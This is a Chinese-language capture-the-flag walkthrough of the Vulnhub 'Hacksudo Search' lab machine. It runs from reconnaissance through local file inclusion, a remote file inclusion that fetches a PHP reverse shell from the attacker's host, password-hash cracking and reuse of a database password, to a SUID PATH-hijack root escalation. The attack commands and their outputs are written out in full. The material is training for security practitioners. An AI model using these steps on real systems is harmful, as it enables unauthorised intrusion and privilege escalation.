Hacksudo Search
识别目标主机IP地址
(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Search]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:0d:63:f0 1 60 PCS Systemtechnik GmbH
192.168.56.155 08:00:27:a4:b5:00 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.155
NMAP扫描
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Search]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.155 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-04 22:25 EST
Nmap scan report for bogon (192.168.56.155)
Host is up (0.00020s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 7b:44:7c:da:fb:e5:e6:1d:76:33:eb:fa:c0:dd:77:44 (RSA)
| 256 13:2d:45:07:32:83:13:eb:4e:a1:20:f4:06:ba:26:8a (ECDSA)
|_ 256 21:a1:86:47:07:1b:df:b2:70:7e:d9:30:e3:29:c2:e7 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: HacksudoSearch
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:A4:B5:00 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.52 seconds
获得Shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Search]
└─$ curl http://192.168.56.155/robots.txt
/* find me * im number 1 search engine .
just joking :)
www.hacksudo.com
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Search]
└─$ nikto -h http://192.168.56.155
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.155
+ Target Hostname: 192.168.56.155
+ Target Port: 80
+ Start Time: 2023-01-04 22:28:38 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.0.1".
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3268: /account/: Directory indexing found.
+ OSVDB-3092: /account/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ /.env: .env file found. The .env file may contain credentials.
+ 7915 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2023-01-04 22:29:37 (GMT-5) (59 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to [email protected]) (y/n)?
nikto工具发现了/account目录,访问该目录,内有若个php文件,但是访问这些文件,返回空白(没有出错)
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Search]
└─$ gobuster dir -u http://192.168.56.155 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.155
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Timeout: 10s
===============================================================
2023/01/04 22:31:05 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 317] [--> http://192.168.56.155/images/]
/assets (Status: 301) [Size: 317] [--> http://192.168.56.155/assets/]
/account (Status: 301) [Size: 318] [--> http://192.168.56.155/account/]
/javascript (Status: 301) [Size: 321] [--> http://192.168.56.155/javascript/]
/LICENSE (Status: 200) [Size: 1074]
/server-status (Status: 403) [Size: 279]
Progress: 219019 / 220561 (99.30%)
===============================================================
2023/01/04 22:31:46 Finished
===============================================================
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Search]
└─$ gobuster dir -u http://192.168.56.155 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt,.js
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.155
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Extensions: php,html,sh,txt,js
[+] Timeout: 10s
===============================================================
2023/01/04 22:31:58 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/index.php (Status: 200) [Size: 715]
/images (Status: 301) [Size: 317] [--> http://192.168.56.155/images/]
/.html (Status: 403) [Size: 279]
/search.php (Status: 200) [Size: 165]
/submit.php (Status: 200) [Size: 165]
/assets (Status: 301) [Size: 317] [--> http://192.168.56.155/assets/]
/account (Status: 301) [Size: 318] [--> http://192.168.56.155/account/]
/javascript (Status: 301) [Size: 321] [--> http://192.168.56.155/javascript/]
/robots.txt (Status: 200) [Size: 75]
/LICENSE (Status: 200) [Size: 1074]
/search1.php (Status: 200) [Size: 2918]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
/crawler.php (Status: 500) [Size: 0]
Progress: 1321241 / 1323366 (99.84%)
===============================================================
2023/01/04 22:36:46 Finished
===============================================================
扫描出search1.php,并且contact链接,作者明显提示需要进行FUZZ
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Search]
└─$ wfuzz -c -u http://192.168.56.155/search1.php?FUZZ=../../../../../../../etc/passwd -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 288
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.56.155/search1.php?FUZZ=../../../../../../../etc/passwd
Total requests: 220560
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000001129: 200 143 L 260 W 3797 Ch "me"
000006096: 200 137 L 288 W 2918 Ch "886"
Total time: 0
Processed Requests: 6102
Filtered Requests: 6101
Requests/sec.: 0
扫描出参数名称为me,手动验证一下是否正确?
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Search]
└─$ curl http://192.168.56.155/search1.php?me=../../../../../../../etc/passwd
<html>
<head>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<style>
* {box-sizing: border-box;}
body {
margin: 0;
font-family: Arial, Helvetica, sans-serif;
}
.topnav {
overflow: hidden;
background-color: #e9e9e9;
}
.topnav a {
float: left;
display: block;
color: black;
text-align: center;
padding: 14px 16px;
text-decoration: none;
font-size: 17px;
}
.topnav a:hover {
background-color: #ddd;
color: black;
}
.topnav a.active {
background-color: #2196F3;
color: white;
}
.topnav .search-container {
float: right;
}
.topnav input[type=text] {
padding: 6px;
margin-top: 8px;
font-size: 17px;
border: none;
}
.topnav .search-container button {
float: right;
padding: 6px 10px;
margin-top: 8px;
margin-right: 16px;
background: #ddd;
font-size: 17px;
border: none;
cursor: pointer;
}
.topnav .search-container button:hover {
background: #ccc;
}
@media screen and (max-width: 600px) {
.topnav .search-container {
float: none;
}
.topnav a, .topnav input[type=text], .topnav .search-container button {
float: none;
display: block;
text-align: left;
width: 100%;
margin: 0;
padding: 14px;
}
.topnav input[type=text] {
border: 1px solid #ccc;
}
}
</style>
<title>
Hacksudo::search
</title>
</head>
<body style="background-color:Navy;">
<!-- find me @hacksudo.com/contact @fuzzing always best option :) -->
<font color=white>
<div class="topnav">
<a class="active" href="?find=home.php">Home</a>
<a href="?Me=about.php">About</a>
<a href="?FUZZ=contact.php">Contact</a>
<div class="search-container">
<form action="submit.php">
<input type="text" placeholder="Search.." name="search">
<button type="submit"><i class="fa fa-search"></i></button>
</form>
</div>
</div>
<div style="padding-left:16px">
<h1><font color=red>HackSudo</font> Search box</h1>
<p>JumpStation The web crawler with Google</p>
</div>
root:x:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:*:2:2:bin:/bin:/usr/sbin/nologin
sys:*:3:3:sys:/dev:/usr/sbin/nologin
sync:*:4:65534:sync:/bin:/bin/sync
games:*:5:60:games:/usr/games:/usr/sbin/nologin
man:*:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:*:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:*:8:8:mail:/var/mail:/usr/sbin/nologin
news:*:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:*:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:*:13:13:proxy:/bin:/usr/sbin/nologin
www-data:*:33:33:www-data:/var/www:/usr/sbin/nologin
backup:*:34:34:backup:/var/backups:/usr/sbin/nologin
list:*:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:*:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:*:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:*:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:*:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:*:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:*:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
hacksudo:x:1000:1000:hacksudo,,,:/home/hacksudo:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false
monali:x:1001:1001:,,,:/home/monali:/bin/bash
john:x:1002:1002:,,,:/home/john:/bin/bash
search:x:1003:1003:,,,:/home/search:/bin/bash
</form>
</font>
<font color=red><h2><marquee> <a href="https://www.hacksudo.com/">Visit --> www.hacksudo.com</marquee></h2></a>
</font>
</div>
</body>
</html>
成功读取了/etc/passwd文件内容,并且知道有3个用户名:
monali
john
search
看是否存在私钥文件
──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Search]
└─$ curl http://192.168.56.155/search1.php?me=../../../../../../../home/search/john/id_rsa
没有找到3个用户的SSH私钥文件。接下来看有无远程文件包含漏洞,在Kali linux任意写一个文本文件,然后启用http服务(通过python)
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Search]
└─$ cat test.txt
haaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Search]
└─$ curl http://192.168.56.155/search1.php?me=http://192.168.56.146:8000/test.txt
<html>
<head>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<style>
* {box-sizing: border-box;}
body {
margin: 0;
font-family: Arial, Helvetica, sans-serif;
}
.topnav {
overflow: hidden;
background-color: #e9e9e9;
}
.topnav a {
float: left;
display: block;
color: black;
text-align: center;
padding: 14px 16px;
text-decoration: none;
font-size: 17px;
}
.topnav a:hover {
background-color: #ddd;
color: black;
}
.topnav a.active {
background-color: #2196F3;
color: white;
}
.topnav .search-container {
float: right;
}
.topnav input[type=text] {
padding: 6px;
margin-top: 8px;
font-size: 17px;
border: none;
}
.topnav .search-container button {
float: right;
padding: 6px 10px;
margin-top: 8px;
margin-right: 16px;
background: #ddd;
font-size: 17px;
border: none;
cursor: pointer;
}
.topnav .search-container button:hover {
background: #ccc;
}
@media screen and (max-width: 600px) {
.topnav .search-container {
float: none;
}
.topnav a, .topnav input[type=text], .topnav .search-container button {
float: none;
display: block;
text-align: left;
width: 100%;
margin: 0;
padding: 14px;
}
.topnav input[type=text] {
border: 1px solid #ccc;
}
}
</style>
<title>
Hacksudo::search
</title>
</head>
<body style="background-color:Navy;">
<!-- find me @hacksudo.com/contact @fuzzing always best option :) -->
<font color=white>
<div class="topnav">
<a class="active" href="?find=home.php">Home</a>
<a href="?Me=about.php">About</a>
<a href="?FUZZ=contact.php">Contact</a>
<div class="search-container">
<form action="submit.php">
<input type="text" placeholder="Search.." name="search">
<button type="submit"><i class="fa fa-search"></i></button>
</form>
</div>
</div>
<div style="padding-left:16px">
<h1><font color=red>HackSudo</font> Search box</h1>
<p>JumpStation The web crawler with Google</p>
</div>
haaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
</form>
</font>
<font color=red><h2><marquee> <a href="https://www.hacksudo.com/">Visit --> www.hacksudo.com</marquee></h2></a>
</font>
</div>
</body>
</html>
发现存在远程文件包含漏洞。
此时在kali linux上拷贝一个shell.php,然后访问该shell.php
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Search]
└─$ cp ~/Desktop/Toolsets/PHPShell/php-reverse-shell.php .
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Search]
└─$ ls
nmap_full_scan php-reverse-shell.php test.txt
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Search]
└─$ mv php-reverse-shell.php shell.php
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Search]
└─$ vim shell.php
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Search]
└─$ curl http://192.168.56.155/search1.php?me=http://192.168.56.146:8000/shell.php
在Kali Linux上成功得到了反弹回来的shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Search]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.155] 54450
Linux HacksudoSearch 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64 GNU/Linux
23:01:34 up 44 min, 0 users, load average: 0.00, 0.03, 0.45
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@HacksudoSearch:/$
提权
将linpeas.sh脚本上传至目标主机的/tmp目录下,修改权限,并执行脚本,输出结果中发现了/etc/passwd.bak文件,
www-data@HacksudoSearch:/tmp$ cat /etc/passwd.bak
cat /etc/passwd.bak
root:$6$cjOge1p.SSVNb4gP$.W3FeKVb7iP1q5wbFMcLM5CSu0xBxgJTH0G69fxSRGHzd34wjWyUONM1tIsIG0wN4oOWriHTOL9f9xS4Qza9E/:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:*:2:2:bin:/bin:/usr/sbin/nologin
sys:*:3:3:sys:/dev:/usr/sbin/nologin
sync:*:4:65534:sync:/bin:/bin/sync
games:*:5:60:games:/usr/games:/usr/sbin/nologin
man:*:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:*:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:*:8:8:mail:/var/mail:/usr/sbin/nologin
news:*:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:*:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:*:13:13:proxy:/bin:/usr/sbin/nologin
www-data:*:33:33:www-data:/var/www:/usr/sbin/nologin
backup:*:34:34:backup:/var/backups:/usr/sbin/nologin
list:*:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:*:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:*:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:*:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:*:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:*:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:*:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
hacksudo:$6$nh9tUD84T7Bfrm8u$KYH9z3KrUQKcM8XgYrMOv4mSUDEnQ0n8P1b/Kup5KmM0hTtgVtntnpcRUQImLCw50ADm.sJkzZ6Ph3XlA/aiR.:1000:1000:hacksudo,,,:/home/hacksudo:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false
monali:x:1001:1001:,,,:/home/monali:/bin/bash
john:x:1002:1002:,,,:/home/john:/bin/bash
其中有hacksudo的密码
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Search]
└─$ vim hacksudo_hashes
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Search]
└─$ john hacksudo_hashes -w /usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Proceeding with wordlist:/usr/share/john/password.lst
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 DONE (2023-01-04 23:14) 0g/s 1837p/s 1837c/s 1837C/s jussi..sss
Session completed.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Search]
└─$ john --show hacksudo_hashes
0 password hashes cracked, 1 left
将hacksudo密码哈希值拷贝形成文件hacksudo_hashes文件,然后用john来破解,但是失败,
采用另外的方法,将/etc/passwd中hacksudo部分拷贝单独形成文件,以及将/etc/passwd.bak(即shadow文件)拷贝单独形成文件,然后用unshadow命令合成,最后用john 成功破解
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Search]
└─$ vim passwd_file
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Search]
└─$ vim shadow_file
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Search]
└─$ unshadow passwd_file shadow_file > enc.txt
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Search]
└─$ cat enc.txt
hacksudo:$6$nh9tUD84T7Bfrm8u$KYH9z3KrUQKcM8XgYrMOv4mSUDEnQ0n8P1b/Kup5KmM0hTtgVtntnpcRUQImLCw50ADm.sJkzZ6Ph3XlA/aiR.:1000:1000:hacksudo,,,:/home/hacksudo:/bin/bash
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Search]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt enc.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
redhat (hacksudo)
1g 0:00:00:18 DONE (2023-01-04 23:19) 0.05370g/s 2653p/s 2653c/s 2653C/s truckin..morgan6
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Search]
└─$ cat passwd_file
hacksudo:x:1000:1000:hacksudo,,,:/home/hacksudo:/bin/bash
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Search]
└─$ cat shadow_file
hacksudo:$6$nh9tUD84T7Bfrm8u$KYH9z3KrUQKcM8XgYrMOv4mSUDEnQ0n8P1b/Kup5KmM0hTtgVtntnpcRUQImLCw50ADm.sJkzZ6Ph3XlA/aiR.:1000:1000:hacksudo,,,:/home/hacksudo:/bin/bash
但是发现切换用户失败:
www-data@HacksudoSearch:/tmp$ su - hacksudo
su - hacksudo
Password: redhat
id
id
su: Authentication failure
www-data@HacksudoSearch:/tmp$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@HacksudoSearch:/tmp$ su - hacksudo
su - hacksudo
Password: redhat
su: Authentication failure
www-data@HacksudoSearch:/tmp$
发现这个密码不对。
在Linpeas.sh输出结果中其实已经有数据库的密码:
══════════╣ Analyzing Env Files (limit 70)
-rw-r--r-- 1 www-data www-data 306 Apr 15 2021 /var/www/html/.env
APP_name=HackSudoSearch
APP_ENV=local
APP_key=base64:aGFja3N1ZG8gaGVscCB5b3UgdG8gbGVhcm4gQ1RGICwgY29udGFjdCB1cyB3d3cuaGFja3N1ZG8uY29tL2NvbnRhY3QK
APP_DEBUG=false
APP_URL=http://localhost
LOG_CHANNEL=stack
DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_USERNAME=hiraman
DB_PASSWORD=MyD4dSuperH3r0!
看下这个密码是否为hacksudo的密码
www-data@HacksudoSearch:/tmp$ su - hacksudo
su - hacksudo
Password: MyD4dSuperH3r0!
hacksudo@HacksudoSearch:~$
晕,竟然john破解shadow得到的密码是不对的。
hacksudo@HacksudoSearch:~$ find / -perm -4000 -type f 2>/dev/null
find / -perm -4000 -type f 2>/dev/null
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/umount
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/su
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/home/hacksudo/search/tools/searchinstall
searchinstall有SUID位
hacksudo@HacksudoSearch:~/search$ cd tools
cd tools
hacksudo@HacksudoSearch:~/search/tools$ ls
ls
file searchinstall searchinstall.c
hacksudo@HacksudoSearch:~/search/tools$ cat searchinstall.c
cat searchinstall.c
#include<unistd.h>
void main()
{ setuid(0);
setgid(0);
system("install");
}
hacksudo@HacksudoSearch:~/search/tools$ echo '/bin/bash' > install
echo '/bin/bash' > install
hacksudo@HacksudoSearch:~/search/tools$ chmod 777 install
chmod 777 install
hacksudo@HacksudoSearch:~/search/tools$ export PATH=/home/hacksudo/search/tools:$PATH
<ools$ export PATH=/home/hacksudo/search/tools:$PATH
hacksudo@HacksudoSearch:~/search/tools$ ./searchinstall
./searchinstall
root@HacksudoSearch:~/search/tools# cd /root
cd /root
root@HacksudoSearch:/root# ls -alh
ls -alh
total 52K
drwx------ 7 root root 4.0K Apr 15 2021 .
drwxr-xr-x 18 root root 4.0K Apr 11 2021 ..
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 3 root root 4.0K Apr 13 2021 .cache
drwx------ 3 root root 4.0K Apr 13 2021 .config
drwx------ 3 root root 4.0K Apr 13 2021 .gnupg
drwxr-xr-x 3 root root 4.0K Apr 11 2021 .local
-rw------- 1 root root 496 Apr 13 2021 .mysql_history
-rw-r----- 1 root root 1.7K Apr 15 2021 notes.txt
drwxr-xr-x 4 root root 4.0K Apr 13 2021 .npm
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r----- 1 root root 488 Apr 15 2021 root.txt
-rw-r--r-- 1 root root 218 Apr 12 2021 .wget-hsts
root@HacksudoSearch:/root# cat root.txt
cat root.txt
_ _ _ ____ _
| |__ __ _ ___| | _____ _ _ __| | ___ / ___| ___ __ _ _ __ ___| |__
| '_ \ / _` |/ __| |/ / __| | | |/ _` |/ _ \ \___ \ / _ \/ _` | '__/ __| '_ \
| | | | (_| | (__| <\__ \ |_| | (_| | (_) | ___) | __/ (_| | | | (__| | | |
|_| |_|\__,_|\___|_|\_\___/\__,_|\__,_|\___/ |____/ \___|\__,_|_| \___|_| |_|
You Successfully Hackudo search box
rooted!!!
flag={9fb4c0afce26929041427c935c6e0879}
root@HacksudoSearch:/root#
经验教训
-
在确认目标主机有本地文件包含漏洞后,看是否有SSH私钥文件,如果没有,看是否存在远程文件包含漏洞。
-
如果目标主机存在远程文件包含漏洞,此时可以在Kali Linux上利用Python的http.server模块启动web,并且拷贝创建shell.php(常见的php reverse shell脚本),然后访问该文件,从而得到反弹的shell
-
本目标主机有点变态,似乎已经破解了某个用户(hacksudo)的密码,但是这个密码并不是真正的密码,而是数据库的密码,教训就是得到的所有密码信息都是有价值的,可以逐个进行尝试。
-
至于本地提权,首先通过find命令找到有SUID位的执行文件,本靶机是自定制的执行文件,而且不需要用strings等命令去查看,直接通过查看其源代码知道会执行某个文件(install),我们可以创建同名的文件,其实为/bin/bash,并修改PATH环境变量,从而得到提权。